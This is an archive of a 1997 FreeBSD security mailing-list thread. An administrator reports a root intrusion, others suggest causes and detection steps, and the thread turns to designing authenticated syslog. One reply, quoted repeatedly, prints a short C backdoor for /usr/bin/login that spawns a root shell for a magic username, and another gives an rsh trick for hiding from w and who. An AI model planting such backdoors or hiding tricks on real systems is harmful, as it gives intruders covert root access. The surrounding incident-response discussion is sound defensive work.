From owner-freebsd-security Mon Jul 28 03:20:16 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id DAA22155 for security-outgoing; Mon, 28 Jul 1997 03:20:16 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id DAA22146 for ; Mon, 28 Jul 1997 03:20:08 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id DAA03869; Mon, 28 Jul 1997 03:19:55 -0700 (PDT)
Date: Mon, 28 Jul 1997 03:19:55 -0700 (PDT)
From: Vincent Poy
To: security@FreeBSD.ORG
cc: "[Mario1-]" , JbHunt
Subject: security hole in FreeBSD
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Greetings,

We've had a hacker on two of our FreeBSD -current machines who hacked the machine as root.

The symptoms are as follows:
1) User on mercury machine complained about perl5 not working, which was perl5.003, since the libmalloc lib it was linked to was missing.
2) I recompiled the perl5 port from the ports tree and it's perl5.00403 and it works.
3) User hacks earth when he doesn't even have an account on the machine and can log in to the machine remotely as root when rlogin and telnet wouldn't allow it.
4) User is invisible in w, finger, who, users and can only be seen using ps -agux on a pty, so I killed the process.
5) User changes hostnames even in a netstat output so it's all garbage.
6) We went to inetd.conf and shut off all daemons except telnetd and rebooted and user still can get onto the machine invisibly.
7) User shuts down the machine and changes root password.

Saw the user on irc posting the password of earth with the login name root. Any ideas?

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 04:31:41 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id EAA24268 for security-outgoing; Mon, 28 Jul 1997 04:31:41 -0700 (PDT)
Received: from onyks.wszib.poznan.pl (onyks.wszib.poznan.pl [150.254.154.240]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id EAA24260 for ; Mon, 28 Jul 1997 04:31:33 -0700 (PDT)
Received: from localhost (loco@localhost) by onyks.wszib.poznan.pl (8.8.6/8.8.5) with SMTP id NAA00437; Mon, 28 Jul 1997 13:30:18 GMT
Date: Mon, 28 Jul 1997 13:30:11 +0000 (GMT)
From: Tomasz Dudziak
To: Vincent Poy
cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 28 Jul 1997, Vincent Poy wrote:

> Greetings,
>
> We've had a hacker on two of our FreeBSD -current machines who
> hacked the machine as root.
>
> The symptoms are as follows:
> 1) User on mercury machine complained about perl5 not working which was
> perl5.003 since libmalloc lib it was linked to was missing.
> 2) I recompiled the perl5 port from the ports tree and it's perl5.00403
> and it works.
> 3) User hacks earth when he doesn't even have an account on the machine
> and can login to the machine remotely as root when rlogin and telnet
> wouldn't allow it.
> 4) User is invisible in w, finger, who, users and can only be seen using
> ps -agux on a pty so I killed the process.
> 5) User changes hostnames even in a netstat output so it's all garbage
> 6) We went to inetd.conf and shut off all daemons except telnetd and
> rebooted and user still can get onto the machine invisibly.
> 7) User shuts down the machine and changes root password
>
> Saw the user on irc posting the password of earth with the login
> name root. Any ideas?
>
> Cheers,
> Vince - vince@MCESTATE.COM - vince@GAIANET.NET
> Unix Networking Operations - FreeBSD-Real Unix for Free
> GaiaNet Corporation - M & C Estate
> Beverly Hills, California USA 90210
> HongKong Stars/Gravis UltraSound Mailing Lists Admin

Well it is possible that he has recompiled /usr/bin/login for example.
Something like:

    if(strcmp(username, "blahblah")==0)
    {
        setuid(0);
        setgid(0);
        system("/bin/sh");
    }

inserted does the job. You are then invisible to w and others... but not netstat I think...

There was a security hole some time ago in perl that allowed local users to gain root access... That's probably the way he got root access...

I would check my binaries, sup and recompile.

greetings,
Tomasz Dudziak

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQB1AwUBM9ye6gQ/iaB0xTA5AQHMewL+NGZQhiQG0Q4ccSbNmAAGaJYQfRDUl9Jn
yb0c+6lP2AW6Om3VhSMFbxlpCgm+wPbrhb2FzwvA8Ad9ELErDdWqIsXGLFa46Gw/
ogLqhFgghp+6aAWTwjWYf0J5qWD7iIIn
=sbe9
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jul 28 04:40:00 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id EAA24497 for security-outgoing; Mon, 28 Jul 1997 04:40:00 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id EAA24492 for ; Mon, 28 Jul 1997 04:39:58 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id EAA04068; Mon, 28 Jul 1997 04:39:28 -0700 (PDT)
Date: Mon, 28 Jul 1997 04:39:27 -0700 (PDT)
From: Vincent Poy
To: Tomasz Dudziak
cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Tomasz Dudziak wrote:

=)On Mon, 28 Jul 1997, Vincent Poy wrote:
=)
=)> Greetings,
=)>
=)> We've had a hacker on two of our FreeBSD -current machines who
=)> hacked the machine as root.
=)>
=)> The symptoms are as follows:
=)> 1) User on mercury machine complained about perl5 not working which was
=)> perl5.003 since libmalloc lib it was linked to was missing.
=)> 2) I recompiled the perl5 port from the ports tree and it's perl5.00403
=)> and it works.
=)> 3) User hacks earth when he doesn't even have an account on the machine
=)> and can login to the machine remotely as root when rlogin and telnet
=)> wouldn't allow it.
=)> 4) User is invisible in w, finger, who, users and can only be seen using
=)> ps -agux on a pty so I killed the process.
=)> 5) User changes hostnames even in a netstat output so it's all garbage
=)> 6) We went to inetd.conf and shut off all daemons except telnetd and
=)> rebooted and user still can get onto the machine invisibly.
=)> 7) User shuts down the machine and changes root password
=)>
=)> Saw the user on irc posting the password of earth with the login
=)> name root. Any ideas?
=)
=)Well it is possible that he has recompiled /usr/bin/login for example.
=)Something like:
=)if(strcmp(username, "blahblah")==0)
=){
=)setuid(0);
=)setgid(0);
=)system("/bin/sh");
=)}
=)inserted does the job. You are then invisible to w and others... but not
=)netstat I think...

He wasn't invisible to netstat but he did do something that faked the hostname even in netstat.

=)There was a security hole some time ago in perl that allowed local users
=)to gain root access... That's probably the way he got root access...
=)I would check my binaries, sup and recompile.

Hmmm, I supped the perl from the most recent ports tree and also all the binaries are about 2 months old from the -current tree. I thought the security hole was way before that. What I didn't get is how did he get access to the second system (earth) when he doesn't have an account there in the first place?

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 05:30:59 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA00199 for security-outgoing; Mon, 28 Jul 1997 05:30:59 -0700 (PDT)
Received: from relaybr.EUnet.fr (relaybr.eunet.fr [193.107.210.133]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id FAA00177 for ; Mon, 28 Jul 1997 05:30:53 -0700 (PDT)
Received: from ericf.EUnet-Bretagne.fr ([193.107.210.161] (may be forged)) by relaybr.EUnet.fr (8.8.6/8.6.9) with SMTP id OAA08677; Mon, 28 Jul 1997 14:40:49 +0200 (MET DST)
Message-ID: <33DC9377.655C@EUnet-Bretagne.fr>
Date: Mon, 28 Jul 1997 14:41:27 +0200
From: Eric Feillant
Reply-To: Eric.Feillant@EUnet-Bretagne.fr
Organization: EUnet BRETAGNE groupe EUnet
X-Mailer: Mozilla 3.01 (Win95; I)
MIME-Version: 1.0
To: Tomasz Dudziak
CC: Vincent Poy , security@FreeBSD.ORG, "[Mario1-]" , JbHunt
Subject: Re: security hole in FreeBSD
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Tomasz Dudziak wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> On Mon, 28 Jul 1997, Vincent Poy wrote:
>
> > Greetings,
> >
> > We've had a hacker on two of our FreeBSD -current machines who
> > hacked the machine as root.
> >
> > The symptoms are as follows:
> > 1) User on mercury machine complained about perl5 not working which was
> > perl5.003 since libmalloc lib it was linked to was missing.
> > 2) I recompiled the perl5 port from the ports tree and it's perl5.00403
> > and it works.
> > 3) User hacks earth when he doesn't even have an account on the machine
> > and can login to the machine remotely as root when rlogin and telnet
> > wouldn't allow it.
> > 4) User is invisible in w, finger, who, users and can only be seen using
> > ps -agux on a pty so I killed the process.
> > 5) User changes hostnames even in a netstat output so it's all garbage
> > 6) We went to inetd.conf and shut off all daemons except telnetd and
> > rebooted and user still can get onto the machine invisibly.
> > 7) User shuts down the machine and changes root password
> >
> > Saw the user on irc posting the password of earth with the login
> > name root. Any ideas?
> >
> > Cheers,
> > Vince - vince@MCESTATE.COM - vince@GAIANET.NET
> > Unix Networking Operations - FreeBSD-Real Unix for Free
> > GaiaNet Corporation - M & C Estate
> > Beverly Hills, California USA 90210
> > HongKong Stars/Gravis UltraSound Mailing Lists Admin
>
> Well it is possible that he has recompiled /usr/bin/login for example.
> Something like:
> if(strcmp(username, "blahblah")==0)
> {
> setuid(0);
> setgid(0);
> system("/bin/sh");
> }
> inserted does the job. You are then invisible to w and others... but not
> netstat I think...

Another way to be invisible is to try something like that:

    rsh localhost sh

A w or who command sees nothing. A ps does.

> There was a security hole some time ago in perl that allowed local users
> to gain root access... That's probably the way he got root access...
> I would check my binaries, sup and recompile.
> greetings,
> Tomasz Dudziak
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3ia
> Charset: noconv
>
> iQB1AwUBM9ye6gQ/iaB0xTA5AQHMewL+NGZQhiQG0Q4ccSbNmAAGaJYQfRDUl9Jn
> yb0c+6lP2AW6Om3VhSMFbxlpCgm+wPbrhb2FzwvA8Ad9ELErDdWqIsXGLFa46Gw/
> ogLqhFgghp+6aAWTwjWYf0J5qWD7iIIn
> =sbe9
> -----END PGP SIGNATURE-----

--
Eric Feillant
EUnet BRETAGNE
140, bd de Creach Gwen
29000 QUIMPER, France
Tel:(+33) 298101620 Fax:(+33) 298101629
Eric.Feillant@EUnet.fr http://www.EUnet.fr
Partner of CISCO, CHECKPOINT (FIREWALL), BAY NETWORKS, UB NETWORK, SUN, CITRIX

From owner-freebsd-security Mon Jul 28 05:37:36 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA00659 for security-outgoing; Mon, 28 Jul 1997 05:37:36 -0700 (PDT)
Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id FAA00650 for ; Mon, 28 Jul 1997 05:37:31 -0700 (PDT)
Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id IAA03043; Mon, 28 Jul 1997 08:36:53 -0400 (EDT)
Date: Mon, 28 Jul 1997 08:36:52 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Vincent Poy
cc: Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Vincent Poy wrote:

> On Mon, 28 Jul 1997, Tomasz Dudziak wrote:
>
> =)Well it is possible that he has recompiled /usr/bin/login for example.
> =)Something like:
> =)if(strcmp(username, "blahblah")==0)
> =){
> =)setuid(0);
> =)setgid(0);
> =)system("/bin/sh");
> =)}
> =)inserted does the job. You are then invisible to w and others... but not
> =)netstat I think...
>
> He wasn't invisible to netstat but he did do something that faked
> the hostname even in netstat.

In this case, the chances are he just inserted some dud DNS entries, or simply set his in-addr.arpa to something nasty. There's nothing one can do to prevent an authoritative name entry (trash or not) from being accepted in DNS or DNSsec.

One thing I would like to see is logging of IP address *and* hostname in the logs. Both are useful, depending on the situation. Due to the nature of TCP, IP addresses are fairly useful in tracing an attack, but often, especially after a time delay, hostnames are the only way to easily contact the maintainer of the IP address. Hostname is also more useful in spotting attacks in the first place, as it's easy for a user to tell when they've logged in from somewhere they haven't :).

BTW, does anyone know if there is a secure logging protocol? Syslog on UDP seems a tad unreliable, not to mention opening one up to DoS. I log to a loghost, and that machine could easily suffer DoS from log flooding, etc. A simple signature arrangement using MD5 (HMAC?) similar to DNS TSIG would be easy enough to arrange, and far more secure. I assume someone, somewhere has written one, or implemented one, but I haven't been following the Internet Draft releases too closely.

> =)There was a security hole some time ago in perl that allowed local users
> =)to gain root access... That's probably the way he got root access...
> =)I would check my binaries, sup and recompile.
>
> Hmmm, I supped the perl from the most recent ports tree and also
> all the binaries are about 2 months old from the -current tree. I thought
> the security hole was way before that. What I didn't get is how did he
> get access to the second system (earth) when he doesn't have an account
> there in the first place?

I'd be tempted to look in all the normal places -- sendmail, etc. What daemons were running on the machine? Any web server processes? Also, I'd heavily suspect that he sniffed a password if no encrypted telnet/ssh is in use.. Any use of NIS going on? Also, .rhosts arrangements can be extremely unhappy if we already know (s)he is messing with DNS entries.

Robert Watson

From owner-freebsd-security Mon Jul 28 06:12:49 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA05254 for security-outgoing; Mon, 28 Jul 1997 06:12:49 -0700 (PDT)
Received: from burgundy.eecs.harvard.edu (dholland@burgundy.eecs.harvard.edu [140.247.60.165]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA05239 for ; Mon, 28 Jul 1997 06:12:45 -0700 (PDT)
Received: (from dholland@localhost) by burgundy.eecs.harvard.edu (8.8.5/8.8.5) id JAA17812; Mon, 28 Jul 1997 09:12:37 -0400 (EDT)
From: David Holland
Message-Id: <199707281312.JAA17812@burgundy.eecs.harvard.edu>
Subject: secure logging (was: Re: security hole in FreeBSD)
To: robert@cyrus.watson.org
Date: Mon, 28 Jul 1997 09:12:37 -0400 (EDT)
Cc: security@freebsd.org
In-Reply-To: from "Robert Watson" at Jul 28, 97 08:36:52 am
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> BTW, does anyone know if there is a secure logging protocol? Syslog on
> UDP seems a tad unreliable, not to mention opening one up to DoS. I log
> to a loghost, and that machine could easily suffer DoS from log flooding,
> etc. A simple signature arrangement using MD5 (HMAC?) similar to DNS TSIG
> would be easy enough to arrange, and far more secure. I assume someone,
> somewhere has written one, or implemented one, but I haven't been
> following the Internet Draft releases too closely.

I don't know of any; if you run across one or are thinking about designing one, please post or mail... absent any other readily available secure mechanism probably the best bet is to carry log data over ssh. Of course, this doesn't solve the denial of service issue as anyone with a login can spam the local syslog.

--
- David A. Holland        | VINO project home page:
dholland@eecs.harvard.edu | http://www.eecs.harvard.edu/vino

From owner-freebsd-security Mon Jul 28 06:43:39 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA06673 for security-outgoing; Mon, 28 Jul 1997 06:43:39 -0700 (PDT)
Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA06664 for ; Mon, 28 Jul 1997 06:43:32 -0700 (PDT)
Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id JAA03478; Mon, 28 Jul 1997 09:40:15 -0400 (EDT)
From: Adam Shostack
Message-Id: <199707281340.JAA03478@homeport.org>
Subject: Re: secure logging (was: Re: security hole in FreeBSD)
In-Reply-To: <199707281312.JAA17812@burgundy.eecs.harvard.edu> from David Holland at "Jul 28, 97 09:12:37 am"
To: dholland@eecs.harvard.edu (David Holland)
Date: Mon, 28 Jul 1997 09:40:14 -0400 (EDT)
Cc: robert@cyrus.watson.org, security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL27 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

| I don't know of any; if you run across one or are thinking about
| designing one, please post or mail... absent any other readily
| available secure mechanism probably the best bet is to carry log data
| over ssh. Of course, this doesn't solve the denial of service issue as
| anyone with a login can spam the local syslog.

I've been working on a draft set of requirements--very drafty, but since the subject came up, I'll share & ask for feedback.

Requirements

Reliability: The system must make substantial efforts to not lose information.

Network Requirements
	TCP based
	Application sequencing with explicit ack before sender deletes
Application Reliability
	NO data discarding
	Solid message handling locally - messages kept until discard
	Repeated message management (?)

Portability
External Alerting
External Intrusion Detection linking

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From owner-freebsd-security Mon Jul 28 06:55:05 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA07176 for security-outgoing; Mon, 28 Jul 1997 06:55:05 -0700 (PDT)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [194.151.74.97]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA07171 for ; Mon, 28 Jul 1997 06:55:00 -0700 (PDT)
Received: (from guido@localhost) by gvr.win.tue.nl (8.8.6/8.8.2) id PAA04645; Mon, 28 Jul 1997 15:53:11 +0200 (MET DST)
From: Guido van Rooij
Message-Id: <199707281353.PAA04645@gvr.win.tue.nl>
Subject: Re: security hole in FreeBSD
In-Reply-To: from Robert Watson at "Jul 28, 97 08:36:52 am"
To: robert@cyrus.watson.org
Date: Mon, 28 Jul 1997 15:53:11 +0200 (MET DST)
Cc: vince@mail.MCESTATE.COM, loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net
X-Mailer: ELM [version 2.4ME+ PL28 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

>
> BTW, does anyone know if there is a secure logging protocol? Syslog on
> UDP seems a tad unreliable, not to mention opening one up to DoS. I log

Not on local delivery of udp packets. Nowadays, the FreeBSD syslogd is shipped with an option -s that makes it refuse syslog messages from remote machines. This of course does not help if you want to be able to get syslog entries from a remote host. But you can refuse udp packets with destination port 513 on your routers.

-Guido

From owner-freebsd-security Mon Jul 28 07:05:04 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA07938 for security-outgoing; Mon, 28 Jul 1997 07:05:04 -0700 (PDT)
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA07921 for ; Mon, 28 Jul 1997 07:04:53 -0700 (PDT)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.5/8.8.5) id KAA28556; Mon, 28 Jul 1997 10:04:50 -0400 (EDT)
Date: Mon, 28 Jul 1997 10:04:50 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199707281404.KAA28556@khavrinen.lcs.mit.edu>
To: David Holland
Cc: security@FreeBSD.ORG
Subject: secure logging (was: Re: security hole in FreeBSD)
In-Reply-To: <199707281312.JAA17812@burgundy.eecs.harvard.edu>
References: <199707281312.JAA17812@burgundy.eecs.harvard.edu>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

< said:

> I don't know of any; if you run across one or are thinking about
> designing one, please post or mail... absent any other readily
> available secure mechanism probably the best bet is to carry log data
> over ssh. Of course, this doesn't solve the denial of service issue as
> anyone with a login can spam the local syslog.

It would be pretty trivial to add Kerberos authentication to syslogd (using krb_mk_safe/krb_rd_safe).... Of course, that doesn't help most users, but perhaps it can serve as an incentive.

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA | - Susan Aglukark and Chad Irschick

From owner-freebsd-security Mon Jul 28 07:56:48 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA10815 for security-outgoing; Mon, 28 Jul 1997 07:56:48 -0700 (PDT)
Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA10808 for ; Mon, 28 Jul 1997 07:56:46 -0700 (PDT)
Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id KAA03275; Mon, 28 Jul 1997 10:56:30 -0400 (EDT)
Date: Mon, 28 Jul 1997 10:56:29 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Adam Shostack
cc: security@FreeBSD.ORG
Subject: Re: secure logging (was: Re: security hole in FreeBSD)
In-Reply-To: <199707281340.JAA03478@homeport.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Adam Shostack wrote:

> | I don't know of any; if you run across one or are thinking about
> | designing one, please post or mail... absent any other readily
> | available secure mechanism probably the best bet is to carry log data
> | over ssh. Of course, this doesn't solve the denial of service issue as
> | anyone with a login can spam the local syslog.
>
> I've been working on a draft set of requirements--very drafty, but
> since the subject came up, I'll share & ask for feedback.
>
> Requirements
>
> Reliability: The system must make substantial efforts to not
> lose information.
>
> Network Requirements
>	TCP based
>	Application sequencing with explicit ack before sender deletes
> Application Reliability
>	NO data discarding
>	Solid message handling locally - messages kept until discard
>	Repeated message management (?)
>
> Portability
> External Alerting
> External Intrusion Detection linking

My initial thought on the matter was a simple MD5 hash/signature on it based on a shared secret. Also, as I thought a bit on it, I became concerned with reliable delivery, sequencing, replay protection, etc. TCP indeed becomes the transport of choice for secured syslog messages, as well as some simple authenticity function. Is MD5 too heavy-weight to use in this environment? Olafur Gudmundsson (TIS) and myself (also TIS) have recently been working with the Transaction Signature draft for DNS (TSIG), and maybe some similar function could be applied.

In the new TSIG draft (due out relatively soon), there is a description of a TCP-based signature system where signatures are made over the concatenation of previous signature, new data, and timing information. This doesn't allow for your specific ACK, which I agree is needed. TSIG provides signatures over the body of a transaction, and in the case of TCP aborts the transaction, which may not be appropriate.

As a loghost, I wish to be able to verify the following:

1. Network log data comes from an entity I wish to accept log data for (probably determined using a DNS FQDN of some type, possibly a hostname, possibly some other entity name.)

2. Network data has not been modified, inserted, lost, or spoofed in any nasty way. Retransmission should be requested if data is modified.

This prevents logs from being flooded with spoofed or false data by hosts or entities that are inappropriate, and provides reliable transmission. This doesn't address log management, which is an on-host issue. Changing current syslog behavior is desirable here: authenticated log entries should be stored with some indication of how they were authenticated, and what identity against. Changing the behavior of syslog concerning accepting arbitrary log messages from arbitrary entities on a host would also be nice. All log entries submitted by logger (etc) should be associated with a user ID; types and levels of log entries submitted should be restricted/able.

Hopefully, the authentication system will allow forwarding of log messages to a log host indirectly. How this is managed may vary on the needs. Should the behavior be:

	Forward all messages, let the log host sort out which to keep

or

	Forward only authenticated messages from a host

The first means only the server has to be configured in order to restrict host entries, the second requires that intermediate servers also do authentication checking. On the other hand, a flood of bogus log messages would take out the forwarder, but not the server in the forwarder verification case? Some thought may be required here.

Just some thoughts -- I haven't really given the issue much thought other than the decision to ask if anyone else had worked on it :). Secure logging is clearly desirable, though.

Robert N Watson

Junior, Logic+Computation, Carnegie Mellon University  http://www.cmu.edu/
Network Security Research, Trusted Information Systems  http://www.tis.com/
Network Administrator, SafePort Network Services  http://www.safeport.com/
robert@fledge.watson.org  rwatson@tis.com  http://www.watson.org/~robert/

From owner-freebsd-security Mon Jul 28 08:00:31 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA10996 for security-outgoing; Mon, 28 Jul 1997 08:00:31 -0700 (PDT)
Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA10990 for ; Mon, 28 Jul 1997 08:00:28 -0700 (PDT)
Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id KAA03282; Mon, 28 Jul 1997 10:59:45 -0400 (EDT)
Date: Mon, 28 Jul 1997 10:59:44 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Guido van Rooij
cc: vince@mail.MCESTATE.COM, loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net
Subject: Re: security hole in FreeBSD
In-Reply-To: <199707281353.PAA04645@gvr.win.tue.nl>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Guido van Rooij wrote:

> >
> > BTW, does anyone know if there is a secure logging protocol? Syslog on
> > UDP seems a tad unreliable, not to mention opening one up to DoS. I log
>
> Not on local delivery of udp packets. Nowadays, the FreeBSD syslogd is shipped
> with an option -s that makes it refuse syslog messages from remote
> machines. This of course does not help if you want to be able to get
> syslog entries from a remote host. But you can refuse udp packets
> with destination port 513 on your routers.

Unfortunately, I don't have the liberty of reconfiguring some of the routers my hosts are accessible through. Using ipfirewall to restrict incoming messages is possible, but undesirable as it doesn't help against spoofing, if the threat is also inside your network. The vulnerable host in the -s case is the loghost, which must accept network log messages. Configuring with a default of -s is a good arrangement.

Robert N Watson

Junior, Logic+Computation, Carnegie Mellon University  http://www.cmu.edu/
Network Security Research, Trusted Information Systems  http://www.tis.com/
Network Administrator, SafePort Network Services  http://www.safeport.com/
robert@fledge.watson.org  rwatson@tis.com  http://www.watson.org/~robert/

From owner-freebsd-security Mon Jul 28 08:45:20 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA13429 for security-outgoing; Mon, 28 Jul 1997 08:45:20 -0700 (PDT)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA13410 for ; Mon, 28 Jul 1997 08:45:14 -0700 (PDT)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.8.4/8.8.4) with ESMTP id RAA01141 for ; Mon, 28 Jul 1997 17:45:11 +0200
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.8.6/brasil-1.2) with UUCP id RAA04796 for security@FreeBSD.ORG; Mon, 28 Jul 1997 17:44:52 +0200
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.6/keltia-uucp-2.9) id RAA05405; Mon, 28 Jul 1997 17:16:34 +0200 (CEST)
Message-ID: <19970728171633.10794@keltia.freenix.fr>
Date: Mon, 28 Jul 1997 17:16:33 +0200
From: Ollivier Robert
To: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.76
In-Reply-To: ; from Vincent Poy on Mon, Jul 28, 1997 at 03:19:55AM -0700
X-Operating-System: FreeBSD 3.0-CURRENT ctm#3481 AMD-K6 MMX @ 208 MHz
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

According to Vincent Poy:
> 1) User on mercury machine complained about perl5 not working which was
> perl5.003 since libmalloc lib it was linked to was missing.
> 2) I recompiled the perl5 port from the ports tree and it's perl5.00403
> and it works.

I don't think he used perl to hack root unless you kept old versions of Perl4 and Perl5. The buffer overflows in Perl4 were plugged in May by Werner. 5.003+ holes are fixed in 5.004 and later.

> 6) We went to inetd.conf and shut off all daemons except telnetd and
> rebooted and user still can get onto the machine invisibly.

That shows that he has used a spare port to hook a root shell on. In this case, "netstat -a" or "lsof -i:TCP" will give you all connections, including those on which a program is LISTENing. That way you'll catch any process left on a port.

--
Ollivier ROBERT -=- FreeBSD: There are no limits -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #23: Sun Jul 20 18:10:34 CEST 1997

From owner-freebsd-security Mon Jul 28 08:49:03 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA13673 for security-outgoing; Mon, 28 Jul 1997 08:49:03 -0700 (PDT)
